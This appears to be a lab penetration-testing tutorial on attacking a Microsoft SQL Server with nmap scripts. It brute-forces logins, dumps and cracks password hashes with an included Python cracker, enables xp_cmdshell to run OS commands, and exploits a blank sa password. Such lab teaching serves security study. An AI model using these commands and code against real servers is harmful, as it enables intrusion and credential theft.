



MSSQL Penetration Testing using Nmap

Hello friends! Today we are going to perform Microsoft SQL penetration testing using NMAP scripts in order to retrieve basic information such as database names, usernames, table names and so on from an SQL Server instance running on Windows. In our previous article we set up Microsoft SQL Server on Windows 10.


Attacker: Kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let’s start!!

Scan port 1433

Open a terminal in Kali Linux and scan the target IP for port 1433, the default TCP port of a SQL Server default instance, using the following nmap command.

nmap -p 1433

In the image below you can observe that port 1433 is open and reported as the MS-SQL service.

Enumerating version information

The following command will attempt to determine configuration and version information for Microsoft SQL Server instances. The script needs no credentials: it queries the SQL Server Browser service on UDP 1434 where one is running, and also sends a TDS pre-login probe to the instance port itself, which the server answers with its version and encryption settings.

nmap -p 1433 --script ms-sql-info

In the image below you can observe the installed version and details of the MS-SQL server.
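To show what the instance-port half of that probe actually sends and reads, here is a minimal MS-TDS PRELOGIN exchange in Python. This is an added example, not the nmap script's code or anything from the original post: it builds the client PRELOGIN packet, parses the server's answer for the VERSION and ENCRYPTION options, and includes a constructed sample response (not a real capture) so it runs offline. The `probe()` helper, the instance name MSSQLSERVER and the sample version 14.0.1000 are assumptions for illustration.

```python
"""Minimal MS-TDS PRELOGIN probe, the TCP/1433 part of what ms-sql-info does (added example)."""
import socket
import struct

# PRELOGIN option tokens (MS-TDS section 2.2.6.5); TERMINATOR ends the option table
VERSION, ENCRYPTION, INSTOPT, THREADID, MARS, TERMINATOR = 0x00, 0x01, 0x02, 0x03, 0x04, 0xFF
ENCRYPTION_MODES = {0x00: "ENCRYPT_OFF", 0x01: "ENCRYPT_ON",
                    0x02: "ENCRYPT_NOT_SUP", 0x03: "ENCRYPT_REQ"}
TDS_PRELOGIN, TDS_RESPONSE = 0x12, 0x04


def _tds_packet(ptype, options):
    """Wrap (token, value) options in one TDS packet: 8-byte header, option table, data area."""
    table_len = 5 * len(options) + 1          # 5 bytes per table entry plus the 0xFF terminator
    table, data = b"", b""
    for token, value in options:
        # offsets are relative to the start of the packet payload (after the 8-byte header)
        table += struct.pack(">BHH", token, table_len + len(data), len(value))
        data += value
    payload = table + bytes([TERMINATOR]) + data
    # header: type, status (0x01 = end of message), total length, SPID, packet id, window
    return struct.pack(">BBHHBB", ptype, 0x01, 8 + len(payload), 0, 1, 0) + payload


def build_prelogin(instance=b"MSSQLSERVER"):
    """Client PRELOGIN: zero version, ENCRYPT_OFF requested, so the server states its own policy."""
    return _tds_packet(TDS_PRELOGIN, [
        (VERSION, bytes(6)),
        (ENCRYPTION, b"\x00"),
        (INSTOPT, instance + b"\x00"),
        (THREADID, struct.pack("<I", 0)),
        (MARS, b"\x00"),
    ])


def parse_prelogin_response(packet):
    """Extract the server version (major.minor.build) and encryption mode from a PRELOGIN reply."""
    ptype, _status, length = struct.unpack(">BBH", packet[:4])
    if ptype != TDS_RESPONSE or length != len(packet):
        raise ValueError("not a complete TDS PRELOGIN response")
    payload, pos, info = packet[8:], 0, {}
    while pos + 5 <= len(payload) and payload[pos] != TERMINATOR:
        token, offset, size = struct.unpack(">BHH", payload[pos:pos + 5])
        value = payload[offset:offset + size]
        if token == VERSION and size >= 4:
            major, minor, build = struct.unpack(">BBH", value[:4])   # UL_VERSION, big-endian build
            info["version"] = f"{major}.{minor}.{build}"
        elif token == ENCRYPTION and size == 1:
            info["encryption"] = ENCRYPTION_MODES.get(value[0], f"unknown(0x{value[0]:02x})")
        pos += 5
    return info


def probe(host, port=1433, timeout=5.0):
    """Send the PRELOGIN to a live instance and parse its reply (assumed helper; needs network)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_prelogin())
        head = sock.recv(8)
        total = struct.unpack(">H", head[2:4])[0]
        body = b""
        while len(head) + len(body) < total:
            chunk = sock.recv(total - 8 - len(body))
            if not chunk:
                break
            body += chunk
        return parse_prelogin_response(head + body)


# Constructed sample reply (not a real capture): SQL Server 14.0.1000 answering ENCRYPT_OFF,
# i.e. only the login packet gets TLS and every later query crosses the wire in the clear.
SAMPLE_RESPONSE = _tds_packet(TDS_RESPONSE, [
    (VERSION, struct.pack(">BBHH", 14, 0, 1000, 169)),
    (ENCRYPTION, b"\x00"),
    (INSTOPT, b"\x00"),
    (THREADID, b""),
    (MARS, b"\x00"),
])

if __name__ == "__main__":
    print(parse_prelogin_response(SAMPLE_RESPONSE))   # {'version': '14.0.1000', 'encryption': 'ENCRYPT_OFF'}
```

The encryption byte is worth reading alongside the version: ENCRYPT_NOT_SUP means the instance cannot do TLS at all, ENCRYPT_OFF means only the login packet is protected and query traffic (including any credentials inside queries) is plaintext on the network, and only ENCRYPT_REQ forces every client onto TLS. Nothing in this exchange requires a login, which is why ms-sql-info works with no credentials.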

Brute Force Attack

The following command will attempt to recover usernames and passwords by brute force against MS-SQL, using the supplied username and password dictionaries. Every guess is a real login attempt: each failure is written to the SQL Server error log and Windows event log as a "Login failed for user" (18456) event, and SQL logins created with CHECK_POLICY enabled inherit the Windows account-lockout policy, so keep the lists short on a production target.

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt

In the image below you can observe that the script has recovered credentials for two users:

  • Username: ignite and password:12345
  • Username: sa and password:admin123

Execute MS-SQL Query

Once you have recovered a login, pass its credentials to the NMAP script that executes an MS-SQL query. The command below runs the query "sp_databases" against the Microsoft SQL server.

"sp_databases" is one of the catalog stored procedures and returns the list of database names the login can see on the instance.

nmap -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=admin123,ms-sql-query.query="sp_databases"

As a result it dumped two database names, "ignite" and "master"; master is one of the built-in system databases of SQL Server (alongside model, msdb and tempdb) and holds the instance-wide logins and configuration.

Check Microsoft SQL server configuration

The following command will attempt to describe the Microsoft SQL server configuration, listing databases, linked servers and sp_configure settings (such as whether xp_cmdshell is enabled), by passing the login credentials as arguments to the nmap script.

nmap -p 1433 --script ms-sql-config --script-args mssql.username=sa,mssql.password=admin123

The configuration settings are shown in the image below.

Obtain a list of tables

The following command will attempt to fetch a list of tables from each database on the Microsoft SQL server by passing the login credentials as arguments to the nmap script.

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=admin123

The list of tables is shown in the image below.

Enumerate NetBIOS information

The following NMAP script will enumerate information from a remote Microsoft SQL service that has NTLM authentication enabled. No credentials are needed.

Sending an MS-TDS NTLM authentication request with an invalid domain and null credentials causes the remote service to respond with an NTLMSSP CHALLENGE message whose target-info block discloses the NetBIOS computer and domain names, the DNS names and the OS build version.

nmap -p 1433 --script ms-sql-ntlm-info

From the image below you can read the NetBIOS and OS information of the remote Microsoft SQL server.
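The disclosure comes from the NTLMSSP CHALLENGE (type 2) message itself, so it is useful to know what is in it. The following Python is an added example, not the nmap script's code or anything from the original post: it parses a CHALLENGE message down to its AV_PAIR target-info entries, and builds a constructed sample message (not a real capture) for a made-up standalone host named WIN10-SQL, Windows build 19041, with an assumed challenge value. Wrapping the NTLM negotiate message inside a TDS LOGIN7 packet is left out; the parser works on the NTLMSSP blob the server returns.

```python
"""Parse the NTLMSSP CHALLENGE that ms-sql-ntlm-info reads (added example)."""
import struct

# AV_PAIR ids in the TargetInfo block (MS-NLMP section 2.2.2.1)
AV_NAMES = {
    0x0001: "netbios_computer_name",
    0x0002: "netbios_domain_name",
    0x0003: "dns_computer_name",
    0x0004: "dns_domain_name",
    0x0005: "dns_tree_name",
}
AV_EOL, AV_TIMESTAMP = 0x0000, 0x0007
NTLMSSP_NEGOTIATE_VERSION = 0x02000000   # set when the 8-byte Version field is present


def parse_ntlm_challenge(msg):
    """Return target names, OS version and server challenge from a CHALLENGE_MESSAGE (type 2)."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE message")
    info = {}
    name_len, _max, name_off = struct.unpack_from("<HHI", msg, 12)   # TargetNameFields
    flags = struct.unpack_from("<I", msg, 20)[0]                     # NegotiateFlags
    info["target_name"] = msg[name_off:name_off + name_len].decode("utf-16-le")
    info["server_challenge"] = msg[24:32].hex()                      # 8-byte ServerChallenge
    ti_len, _max, ti_off = struct.unpack_from("<HHI", msg, 40)       # TargetInfoFields
    if flags & NTLMSSP_NEGOTIATE_VERSION:
        major, minor, build = struct.unpack_from("<BBH", msg, 48)    # Version: Windows build
        info["os_version"] = f"{major}.{minor}.{build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        pos += 4
        if av_id == AV_EOL:
            break
        value = msg[pos:pos + av_len]
        pos += av_len
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = value.decode("utf-16-le")
        elif av_id == AV_TIMESTAMP:                                  # FILETIME, 100 ns ticks since 1601
            info["timestamp"] = struct.unpack("<Q", value)[0]
    return info


def build_sample_challenge():
    """Constructed CHALLENGE_MESSAGE (not a real capture) for a standalone host named WIN10-SQL."""
    def u16(s):
        return s.encode("utf-16-le")

    def av(av_id, value):
        return struct.pack("<HH", av_id, len(value)) + value

    target = u16("WIN10-SQL")
    target_info = (av(0x0002, u16("WIN10-SQL")) + av(0x0001, u16("WIN10-SQL"))
                   + av(0x0004, u16("win10-sql")) + av(0x0003, u16("win10-sql"))
                   + av(AV_TIMESTAMP, struct.pack("<Q", 132186400000000000))
                   + av(AV_EOL, b""))
    flags = 0xE28A8215                        # typical server flag set; includes NEGOTIATE_VERSION
    header_len = 56                           # fixed header size when the Version field is present
    msg = b"NTLMSSP\x00" + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(target), len(target), header_len)
    msg += struct.pack("<I", flags)
    msg += bytes.fromhex("0123456789abcdef")  # server challenge (assumed value)
    msg += bytes(8)                           # Reserved
    msg += struct.pack("<HHI", len(target_info), len(target_info), header_len + len(target))
    msg += struct.pack("<BBH", 10, 0, 19041) + bytes(3) + b"\x0f"   # Windows 10 build 19041, NTLM rev 15
    return msg + target + target_info


if __name__ == "__main__":
    for key, value in parse_ntlm_challenge(build_sample_challenge()).items():
        print(f"{key}: {value}")
```

When the NetBIOS domain name equals the computer name, as in the sample, the host is standalone rather than domain-joined; the build number in the Version field is what lets the script print an OS version without ever touching SMB.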

Dump password hashes

The following command will dump the password hashes of the SQL logins on an MS-SQL server in a format suitable for cracking with tools such as John the Ripper. Reading the password_hash column of sys.sql_logins requires CONTROL SERVER permission, which members of the sysadmin role (and therefore sa) hold.

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=sa,mssql.password=admin123

In the image you can observe that it dumped the password hashes of the logins on the instance, including sa, whose password we already recovered above.
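To make sense of what gets dumped, the Python below is an added example, not the nmap script's code or anything from the original post: it reproduces the hash construction SQL Server stores in sys.sql_logins (0x0100 with SHA-1 for 2005 through 2008 R2, 0x0200 with SHA-512 for 2012 and later), checks a dumped hash against a candidate, and runs a small wordlist over a constructed dump in the same user:0x... line form. The salts and the svc_backup login are assumptions made up for the sample.

```python
"""Verify and crack SQL Server login hashes offline, the format ms-sql-dump-hashes emits (added example)."""
import hashlib

# sys.sql_logins.password_hash layout:
#   0x0100 | 4-byte salt | SHA-1  (UTF-16LE(password) || salt)   SQL Server 2005 - 2008 R2
#   0x0200 | 4-byte salt | SHA-512(UTF-16LE(password) || salt)   SQL Server 2012 and later
HASH_ALGOS = {"0100": ("sha1", 20), "0200": ("sha512", 64)}


def mssql_hash(password, salt, version="0200"):
    """Compute the hash SQL Server stores for `password` with the given 4-byte salt."""
    if len(salt) != 4:
        raise ValueError("SQL Server salts are 4 bytes")
    algo, _ = HASH_ALGOS[version]
    digest = hashlib.new(algo, password.encode("utf-16-le") + salt).digest()
    return "0x" + version + salt.hex() + digest.hex()


def split_hash(hash_hex):
    """Split a dumped hash into (version, salt bytes, digest hex); reject unknown or truncated input."""
    h = hash_hex.strip().lower()
    if h.startswith("0x"):
        h = h[2:]
    version = h[:4]
    if version not in HASH_ALGOS:
        raise ValueError(f"unsupported hash version {version!r}")
    _, digest_len = HASH_ALGOS[version]
    if len(h) != 4 + 8 + 2 * digest_len:
        raise ValueError("hash length does not match its version prefix")
    return version, bytes.fromhex(h[4:12]), h[12:]


def check_password(hash_hex, candidate):
    """True if `candidate` is the password behind the dumped hash."""
    version, salt, digest = split_hash(hash_hex)
    return mssql_hash(candidate, salt, version)[-len(digest):] == digest


def crack_dump(lines, wordlist):
    """Run a wordlist over 'user:0x...' lines; return {user: password} for every hit."""
    found = {}
    for line in lines:
        line = line.strip()
        if ":0x" not in line:
            continue                      # skip the script's banner/indentation lines
        user, hash_hex = line.split(":", 1)
        for candidate in wordlist:
            if check_password(hash_hex, candidate):
                found[user] = candidate
                break
    return found


# Constructed dump (not a real capture): fixed salts so the sample is reproducible.
SAMPLE_DUMP = [
    "sa:" + mssql_hash("admin123", bytes.fromhex("a1b2c3d4")),
    "ignite:" + mssql_hash("12345", bytes.fromhex("0badf00d"), version="0100"),
    "svc_backup:" + mssql_hash("correct horse battery staple", bytes.fromhex("5eed5a17")),
]

if __name__ == "__main__":
    print(crack_dump(SAMPLE_DUMP, ["password", "12345", "admin123"]))   # {'sa': 'admin123', 'ignite': '12345'}
```

The dumped lines feed straight into john (--format=mssql12 for 0x0200 hashes, mssql05 for 0x0100) or hashcat (-m 1731 and -m 132 respectively); the example exists to show what the bytes mean. Note that a 4-byte salt only prevents precomputation across logins, and a single unsalted-speed SHA-512 per guess is cheap, so short passwords like the two recovered above fall to a dictionary in seconds.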

Identify the database owner

The following command will query the Microsoft SQL Server instance for the list of databases the supplied login has access to, together with each database's owner. The login needs appropriate privileges on the instance, so we again pass a username and password as arguments to the NMAP script (the script is named ms-sql-hasdbaccess).

nmap -p 1433 --script ms-sql-hasdbaccess --script-args mssql.username=sa,mssql.password=admin123

In the image below you can observe that it shows user sa as the owner of the database "ignite".

MS-SQL allows the xp_cmdshell option

xp_cmdshell is an extended stored procedure of Microsoft SQL Server that lets a sysadmin run an operating-system command from inside a query, in the security context of the SQL Server service account. By default the xp_cmdshell option is disabled, and it is an advanced option, so "show advanced options" must be turned on before it can be changed. Enabling it requires sysadmin rights (or ALTER SETTINGS), which the sa login has.

From the image below you can see that we enabled xp_cmdshell by executing the following statements inside the master database:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;

Now apply the above configuration change with the following statement:

RECONFIGURE;
Exploit XP_cmdshell Function

Now the following NMAP script will attempt to run a command through the command shell of Microsoft SQL Server, provided xp_cmdshell is enabled on the targeted server. The command is passed in the ms-sql-xp-cmdshell.cmd script argument.

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=admin123,ms-sql-xp-cmdshell.cmd="net user"

From the image below you can confirm that we executed the OS command "net user", which lists the local user accounts of the Windows host.

Blank password leads to unauthorized access

If the administrator of Microsoft SQL Server leaves a login's password empty, an attacker can log straight into the database server. In the image below we are looking at the properties of the user account "sa".

Here the password for user "sa" has been left blank. As we know, sa is by default the administrator of the MS-SQL server, so with an empty password the chance of an attacker gaining unauthorized access to the server increases greatly.

Make unauthorized access into SQL server

The following NMAP script will try to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account. It needs no script arguments.

nmap -p 1433 --script ms-sql-empty-password

From the image below you can see that we logged in successfully as user sa with an empty password.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher
